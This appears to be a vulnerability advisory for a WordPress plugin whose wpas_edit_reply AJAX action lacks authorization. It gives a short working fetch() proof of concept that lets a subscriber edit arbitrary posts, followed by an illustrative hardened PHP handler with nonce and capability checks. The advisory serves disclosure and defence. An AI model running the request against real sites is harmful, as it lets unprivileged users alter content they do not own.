Description

The plugin does not correctly authorize the wpas_edit_reply function, allowing users to edit posts for which they do not have permission.

Log in as a subscriber and run the following code in the browser, setting the reply_id to any post ID.

    fetch("/wp-admin/admin-ajax.php", {
      "headers": { "content-type": "application/x-www-form-urlencoded" },
      "body": new URLSearchParams({"action": "wpas_edit_reply", "reply_id": "1", "reply_content": "hello"}),
      "method": "POST",
      "credentials": "include"
    });
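
For comparison, an AJAX handler for the same action that enforces a nonce and a per-post capability check before writing. This is an added example, not the plugin's code or its actual fix: the function name, nonce action, nonce field name and post type are assumptions chosen for illustration.

```php
<?php
// Added example, not the plugin's code. Names below are assumptions.
const EXAMPLE_REPLY_POST_TYPE = 'example_reply';      // assumed reply post type
const EXAMPLE_NONCE_ACTION    = 'example_edit_reply'; // assumed nonce action

// wp_ajax_{action} only guarantees the caller is logged in. A subscriber
// passes that gate, so authorization has to happen inside the handler.
add_action( 'wp_ajax_wpas_edit_reply', 'example_edit_reply_hardened' );

function example_edit_reply_hardened() {
    // 1. CSRF: reject requests without a valid nonce in the 'nonce' field.
    if ( ! check_ajax_referer( EXAMPLE_NONCE_ACTION, 'nonce', false ) ) {
        wp_send_json_error( 'invalid nonce', 403 );
    }

    // 2. Validate the target: it must exist and must be a reply, so the
    //    handler cannot be pointed at arbitrary posts or pages.
    $reply_id = isset( $_POST['reply_id'] ) ? absint( $_POST['reply_id'] ) : 0;
    $reply    = $reply_id ? get_post( $reply_id ) : null;
    if ( ! $reply || EXAMPLE_REPLY_POST_TYPE !== $reply->post_type ) {
        wp_send_json_error( 'not a reply', 404 );
    }

    // 3. Object-level authorization: 'edit_post' is a meta capability that
    //    WordPress maps to the right primitive capability for this post ID.
    if ( ! current_user_can( 'edit_post', $reply_id ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    // 4. Sanitize the content, then re-slash because wp_update_post()
    //    expects slashed input.
    $content = isset( $_POST['reply_content'] )
        ? wp_kses_post( wp_unslash( $_POST['reply_content'] ) )
        : '';
    $result = wp_update_post(
        array( 'ID' => $reply_id, 'post_content' => wp_slash( $content ) ),
        true // return WP_Error on failure
    );
    if ( is_wp_error( $result ) ) {
        wp_send_json_error( 'update failed', 500 );
    }

    wp_send_json_success( array( 'reply_id' => $reply_id ) );
}
```

With these checks in place, the subscriber request shown above should return a 403 instead of modifying the post.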